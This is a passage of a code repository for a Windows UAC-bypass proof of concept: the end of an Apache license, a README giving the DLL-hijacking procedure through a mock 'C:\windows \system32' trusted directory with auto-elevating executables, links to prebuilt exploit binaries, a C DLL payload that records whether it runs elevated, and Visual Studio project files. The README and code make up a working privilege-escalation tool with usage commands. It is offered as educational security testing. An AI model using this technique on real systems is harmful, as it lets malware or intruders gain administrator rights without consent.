 71 |       Work and such Derivative Works in Source or Object form.
 72 | 
 73 |    3. Grant of Patent License. Subject to the terms and conditions of
 74 |       this License, each Contributor hereby grants to You a perpetual,
 75 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 76 |       (except as stated in this section) patent license to make, have made,
 77 |       use, offer to sell, sell, import, and otherwise transfer the Work,
 78 |       where such license applies only to those patent claims licensable
 79 |       by such Contributor that are necessarily infringed by their
 80 |       Contribution(s) alone or by combination of their Contribution(s)
 81 |       with the Work to which such Contribution(s) was submitted. If You
 82 |       institute patent litigation against any entity (including a
 83 |       cross-claim or counterclaim in a lawsuit) alleging that the Work
 84 |       or a Contribution incorporated within the Work constitutes direct
 85 |       or contributory patent infringement, then any patent licenses
 86 |       granted to You under this License for that Work shall terminate
 87 |       as of the date such litigation is filed.
 88 | 
 89 |    4. Redistribution. You may reproduce and distribute copies of the
 90 |       Work or Derivative Works thereof in any medium, with or without
 91 |       modifications, and in Source or Object form, provided that You
 92 |       meet the following conditions:
 93 | 
 94 |       (a) You must give any other recipients of the Work or
 95 |           Derivative Works a copy of this License; and
 96 | 
 97 |       (b) You must cause any modified files to carry prominent notices
 98 |           stating that You changed the files; and
 99 | 
100 |       (c) You must retain, in the Source form of any Derivative Works
101 |           that You distribute, all copyright, patent, trademark, and
102 |           attribution notices from the Source form of the Work,
103 |           excluding those notices that do not pertain to any part of
104 |           the Derivative Works; and
105 | 
106 |       (d) If the Work includes a "NOTICE" text file as part of its
107 |           distribution, then any Derivative Works that You distribute must
108 |           include a readable copy of the attribution notices contained
109 |           within such NOTICE file, excluding those notices that do not
110 |           pertain to any part of the Derivative Works, in at least one
111 |           of the following places: within a NOTICE text file distributed
112 |           as part of the Derivative Works; within the Source form or
113 |           documentation, if provided along with the Derivative Works; or,
114 |           within a display generated by the Derivative Works, if and
115 |           wherever such third-party notices normally appear. The contents
116 |           of the NOTICE file are for informational purposes only and
117 |           do not modify the License. You may add Your own attribution
118 |           notices within Derivative Works that You distribute, alongside
119 |           or as an addendum to the NOTICE text from the Work, provided
120 |           that such additional attribution notices cannot be construed
121 |           as modifying the License.
122 | 
123 |       You may add Your own copyright statement to Your modifications and
124 |       may provide additional or different license terms and conditions
125 |       for use, reproduction, or distribution of Your modifications, or
126 |       for any such Derivative Works as a whole, provided Your use,
127 |       reproduction, and distribution of the Work otherwise complies with
128 |       the conditions stated in this License.
129 | 
130 |    5. Submission of Contributions. Unless You explicitly state otherwise,
131 |       any Contribution intentionally submitted for inclusion in the Work
132 |       by You to the Licensor shall be under the terms and conditions of
133 |       this License, without any additional terms or conditions.
134 |       Notwithstanding the above, nothing herein shall supersede or modify
135 |       the terms of any separate license agreement you may have executed
136 |       with Licensor regarding such Contributions.
137 | 
138 |    6. Trademarks. This License does not grant permission to use the trade
139 |       names, trademarks, service marks, or product names of the Licensor,
140 |       except as required for reasonable and customary use in describing the
141 |       origin of the Work and reproducing the content of the NOTICE file.
142 | 
143 |    7. Disclaimer of Warranty. Unless required by applicable law or
144 |       agreed to in writing, Licensor provides the Work (and each
145 |       Contributor provides its Contributions) on an "AS IS" BASIS,
146 |       WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 |       implied, including, without limitation, any warranties or conditions
148 |       of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 |       PARTICULAR PURPOSE. You are solely responsible for determining the
150 |       appropriateness of using or redistributing the Work and assume any
151 |       risks associated with Your exercise of permissions under this License.
152 | 
153 |    8. Limitation of Liability. In no event and under no legal theory,
154 |       whether in tort (including negligence), contract, or otherwise,
155 |       unless required by applicable law (such as deliberate and grossly
156 |       negligent acts) or agreed to in writing, shall any Contributor be
157 |       liable to You for damages, including any direct, indirect, special,
158 |       incidental, or consequential damages of any character arising as a
159 |       result of this License or out of the use or inability to use the
160 |       Work (including but not limited to damages for loss of goodwill,
161 |       work stoppage, computer failure or malfunction, or any and all
162 |       other commercial damages or losses), even if such Contributor
163 |       has been advised of the possibility of such damages.
164 | 
165 |    9. Accepting Warranty or Additional Liability. While redistributing
166 |       the Work or Derivative Works thereof, You may choose to offer,
167 |       and charge a fee for, acceptance of support, warranty, indemnity,
168 |       or other liability obligations and/or rights consistent with this
169 |       License. However, in accepting such obligations, You may act only
170 |       on Your own behalf and on Your sole responsibility, not on behalf
171 |       of any other Contributor, and only if You agree to indemnify,
172 |       defend, and hold each Contributor harmless for any liability
173 |       incurred by, or claims asserted against, such Contributor by reason
174 |       of your accepting any such warranty or additional liability.
175 | 
176 |    END OF TERMS AND CONDITIONS
177 | 
178 |    APPENDIX: How to apply the Apache License to your work.
179 | 
180 |       To apply the Apache License to your work, attach the following
181 |       boilerplate notice, with the fields enclosed by brackets "[]"
182 |       replaced with your own identifying information. (Don't include
183 |       the brackets!)  The text should be enclosed in the appropriate
184 |       comment syntax for the file format. We also recommend that a
185 |       file or class name and description of purpose be included on the
186 |       same "printed page" as the copyright notice for easier
187 |       identification within third-party archives.
188 | 
189 |    Copyright [yyyy] [name of copyright owner]
190 | 
191 |    Licensed under the Apache License, Version 2.0 (the "License");
192 |    you may not use this file except in compliance with the License.
193 |    You may obtain a copy of the License at
194 | 
195 |        http://www.apache.org/licenses/LICENSE-2.0
196 | 
197 |    Unless required by applicable law or agreed to in writing, software
198 |    distributed under the License is distributed on an "AS IS" BASIS,
199 |    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 |    See the License for the specific language governing permissions and
201 |    limitations under the License.
202 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # UAC bypass - DLL hijacking 
  2 | 
  3 | ## Description
  4 | 
  5 | This is a PoC for bypassing [UAC](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) using [DLL hijacking](https://attack.mitre.org/techniques/T1574/001/) and abusing the "Trusted Directories" verification. 
  6 | 
  7 | ## Summary
  8 | 
  9 | - [Generate Header from CSV](#generate-header-from-csv)
 10 |     - [Arguments](#arguments)
 11 | - [Generate the list of vulnerable PE and DLL](#generate-the-list-of-vulnerable-pe-and-dll)
 12 |     - [DLLHijacking.exe](#dllhijackingexe)
 13 |     - [Log file](#log-file)
 14 |     - [Execution](#execution)
 15 |     - [Result](#result)
 16 | - [test.dll](#testdll)
 17 | - [Sources](#sources)
 18 | 
 19 | ## Generate Header from CSV
 20 | 
 21 | The python script `CsvToHeader.py` can be used to generate a header file. By default it will use the CSV file `dll_hijacking_candidates.csv` that can be found here: [dll_hijacking_candidates.csv](https://raw.githubusercontent.com/wietze/windows-dll-hijacking/master/dll_hijacking_candidates.csv).
 22 | 
 23 | The script will check for each portable executable(PE) the following condition:
 24 | - If the PE exists in the file system.
 25 | - In the manifest of the PE, if the _requestedExecutionLevel_ is set to one of the following values: 
 26 |   - `asInvoker`
 27 |   - `highestAvailable` 
 28 |   - `requireAdministrator`
 29 | - In the manifest if the autoElevate is set to true:
 30 |     ```xml
 31 |     <autoElevate>true</autoElevate>
 32 |     ```
 33 | - If the user specified the `-c` argument, the script will check if the DLL to hijack is in the list of DLLs imported form PE table.
 34 | 
 35 | ### Arguments 
 36 | 
 37 | ```
 38 | > python .\CsvToHeader.py -h
 39 | usage: CsvToHeader.py -f [DLL_PATH] -c
 40 | 
 41 | CsvToHeader can be used to generate a header file from a CSV.
 42 | 
 43 | optional arguments:
 44 |   -h, --help      show this help message and exit
 45 |   -f  [DLL_PATH]  Path of the csv to convert (default="dll_hijacking_candidates.csv")
 46 |   -c              Enable import dll in PE (default=False)
 47 |   -v, --version   Show program's version number and exit
 48 | ```
 49 | 
 50 | To generate the header file you can use the following command:
 51 | 
 52 |     python CsvToHeader.py > dll_hijacking_candidates.h
 53 | 
 54 | 
 55 | ## Generate the list of vulnerable PE and DLL
 56 | 
 57 | The files that will be used are `DLLHijacking.exe` and `test.dll`.
 58 | 
 59 | ### DLLHijacking.exe
 60 | 
 61 | DLLHijacking.exe is the file that will be used to generate the list of vulnerable PE.
 62 | It will perform the following steps:
 63 | 1. CreateFakeDirectory 
 64 |    
 65 |     Function that create a directory in `C:\windows \system32`.
 66 | 
 67 | 2. Copy Files in the new directory
 68 |      - from `C:\windows\system32\[TARGET.EXE]` to `C:\windows \system32\[TARGET.EXE]`
 69 |      - from `[CUSTOM_DLL_PATH]` to `C:\windows \system32\[TARGET.DLL]`
 70 | 3. Trigger
 71 |    
 72 |    Run the executable from `C:\windows \system32\[TARGET.EXE]`
 73 | 
 74 | 4. CleanUpFakeDirectory
 75 | 
 76 |     Function that delete the directory created in step 1 and files from step 2.
 77 | 5. CheckExploit
 78 | 
 79 |     Check the content of the file `C:\ProgramData\exploit.txt` to see if the exploit was successful.
 80 | 
 81 | ### Log file
 82 | 
 83 | DLLHijacking.exe will always generate a log file `exploitable.log` with the following content:
 84 | - 0 or 1 to indicates whether the exploit was able to bypass the UAC.
 85 | - The executable name
 86 | - The dll name
 87 |   
 88 | E.g.
 89 | ```
 90 | 1,computerdefaults.exe,PROPSYS.dll
 91 | 0,computerdefaults.exe,Secur32.dll
 92 | ```
 93 | 
 94 | ### Execution 
 95 | 
 96 | Command to run:
 97 | 
 98 |     DLLHijacking.exe [DLL_PATH]
 99 | 
100 | if no argument is passed, the script will use the DLL `test.dll` which is stored in the resouce of `DLLHijacking.exe`.
101 | 
102 | ### Result
103 | 
104 | Tested on Windows 10 Pro (10.0.19043 N/A Build 19043).
105 | 
106 | ![ExploitResult](ExploitResult.png)
107 | 
108 | ## test.dll
109 | 
110 | `test.dll` is a simple dynamic library that will be use to see if the exploit is successfully.
111 | The DLL will create a file `C:\ProgramData\exploit.txt` with the following content:
112 | - 0 or 1 to indicates whether the exploit was able to bypass the UAC.
113 | - The executable name
114 | - The DLL name
115 | 
116 | This file will be deleted once the exploit is complete.
117 | 
118 | ## Sources:
119 | 
120 | - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
121 | - https://github.com/wietze/windows-dll-hijacking/
122 | - https://github.com/wietze/windows-dll-hijacking/blob/master/dll_hijacking_candidates.csv
123 | - https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
124 | 
125 | 
126 | ## Legal Disclaimer:
127 | 
128 |     This project is made for educational and ethical testing purposes only. Usage of this software for attacking targets without prior mutual consent is illegal. 
129 |     It is the end user's responsibility to obey all applicable local, state and federal laws. 
130 |     Developers assume no liability and are not responsible for any misuse or damage caused by this program.
131 | 


--------------------------------------------------------------------------------
/Release/DLLHijacking.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecuProject/DLLHijackingScanner/c492490e665befe97124d2683680e5a8818baaad/Release/DLLHijacking.exe


--------------------------------------------------------------------------------
/Release/test.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecuProject/DLLHijackingScanner/c492490e665befe97124d2683680e5a8818baaad/Release/test.dll


--------------------------------------------------------------------------------
/test/main.c:
--------------------------------------------------------------------------------
 1 | #include <windows.h>
 2 | #include <stdio.h>
 3 | 
 4 | 
 5 | BOOL IsRunAsAdmin() {
 6 | 	BOOL  fIsRunAsAdmin = FALSE;
 7 | 	PSID  pAdministratorsGroup = NULL;
 8 | 
 9 | 	SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
10 | 	if (AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pAdministratorsGroup)) {
11 | 		if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin)) {
12 | 			FreeSid(pAdministratorsGroup);
13 | 			return fIsRunAsAdmin;
14 | 		}
15 | 		FreeSid(pAdministratorsGroup);
16 | 	}
17 | 	return fIsRunAsAdmin;
18 | }
19 | BOOL ExploitValidation(BOOL fIsRunAsAdmin, HMODULE hModule) {
20 | 	const char* textFile = "C:\\ProgramData\\exploit.txt";
21 |     char processFullPath[MAX_PATH];
22 | 	char dllFullPath[MAX_PATH];
23 | 
24 |     GetModuleFileNameA(NULL, processFullPath, MAX_PATH);
25 |     GetModuleFileNameA(hModule, dllFullPath, MAX_PATH);
26 | 
27 | 	FILE* pFile;
28 | 	if (fopen_s(&pFile, textFile, "w") == 0) {
29 | 		fprintf(pFile, "%i %s %s", fIsRunAsAdmin, processFullPath, dllFullPath);
30 | 		fclose(pFile);
31 | 		return TRUE;
32 | 	}
33 | 	return FALSE;
34 | }
35 | 
36 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
37 | 	switch (ul_reason_for_call) {
38 | 	case DLL_PROCESS_ATTACH:
39 | 		ExploitValidation(IsRunAsAdmin(), hModule);
40 | 		ExitProcess(0);
41 | 	case DLL_THREAD_ATTACH:
42 | 	case DLL_THREAD_DETACH:
43 | 	case DLL_PROCESS_DETACH:
44 | 		break;
45 | 	}
46 | 	return TRUE;
47 | }
48 | 


--------------------------------------------------------------------------------
/test/test.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{d641ec04-af30-495d-b253-c636f0952ec3}</ProjectGuid>
 25 |     <RootNamespace>test</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v142</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <ConformanceMode>true</ConformanceMode>
 91 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
 92 |     </ClCompile>
 93 |     <Link>
 94 |       <SubSystem>Console</SubSystem>
 95 |       <GenerateDebugInformation>false</GenerateDebugInformation>
 96 |     </Link>
 97 |   </ItemDefinitionGroup>
 98 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 99 |     <ClCompile>
100 |       <WarningLevel>Level3</WarningLevel>
101 |       <FunctionLevelLinking>true</FunctionLevelLinking>
102 |       <IntrinsicFunctions>true</IntrinsicFunctions>
103 |       <SDLCheck>true</SDLCheck>
104 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
105 |       <ConformanceMode>true</ConformanceMode>
106 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
107 |     </ClCompile>
108 |     <Link>
109 |       <SubSystem>Console</SubSystem>
110 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
111 |       <OptimizeReferences>true</OptimizeReferences>
112 |       <GenerateDebugInformation>false</GenerateDebugInformation>
113 |     </Link>
114 |   </ItemDefinitionGroup>
115 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
116 |     <ClCompile>
117 |       <WarningLevel>Level3</WarningLevel>
118 |       <SDLCheck>true</SDLCheck>
119 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
120 |       <ConformanceMode>true</ConformanceMode>
121 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
122 |     </ClCompile>
123 |     <Link>
124 |       <SubSystem>Console</SubSystem>
125 |       <GenerateDebugInformation>false</GenerateDebugInformation>
126 |     </Link>
127 |   </ItemDefinitionGroup>
128 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
129 |     <ClCompile>
130 |       <WarningLevel>Level3</WarningLevel>
131 |       <FunctionLevelLinking>true</FunctionLevelLinking>
132 |       <IntrinsicFunctions>true</IntrinsicFunctions>
133 |       <SDLCheck>true</SDLCheck>
134 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
135 |       <ConformanceMode>true</ConformanceMode>
136 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
137 |     </ClCompile>
138 |     <Link>
139 |       <SubSystem>Console</SubSystem>
140 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
141 |       <OptimizeReferences>true</OptimizeReferences>
142 |       <GenerateDebugInformation>false</GenerateDebugInformation>
143 |     </Link>
144 |   </ItemDefinitionGroup>
145 |   <ItemGroup>
146 |     <ClCompile Include="main.c" />
147 |   </ItemGroup>
148 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
149 |   <ImportGroup Label="ExtensionTargets">
150 |   </ImportGroup>
151 | </Project>


--------------------------------------------------------------------------------
/test/test.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="main.c">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/test/test.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/x64/Release/DLLHijacking.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecuProject/DLLHijackingScanner/c492490e665befe97124d2683680e5a8818baaad/x64/Release/DLLHijacking.exe


--------------------------------------------------------------------------------
/x64/Release/test.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecuProject/DLLHijackingScanner/c492490e665befe97124d2683680e5a8818baaad/x64/Release/test.dll


--------------------------------------------------------------------------------